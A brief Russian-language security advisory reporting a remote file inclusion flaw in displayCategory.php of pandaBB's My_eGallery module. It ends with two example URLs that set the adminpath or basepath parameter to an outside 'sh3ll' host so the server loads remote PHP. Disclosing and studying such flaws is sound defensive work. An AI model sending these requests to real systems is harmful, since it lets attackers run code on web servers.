Программа: pandaBB
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных во множественных параметрах сценарием displayCategory.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://host/pandadir/modules/My_eGallery/public/ displayCategory.php?adminpath=http://sh3ll
http://host/pandadir/modules/My_eGallery/public/ displayCategory.php?basepath=http://sh3ll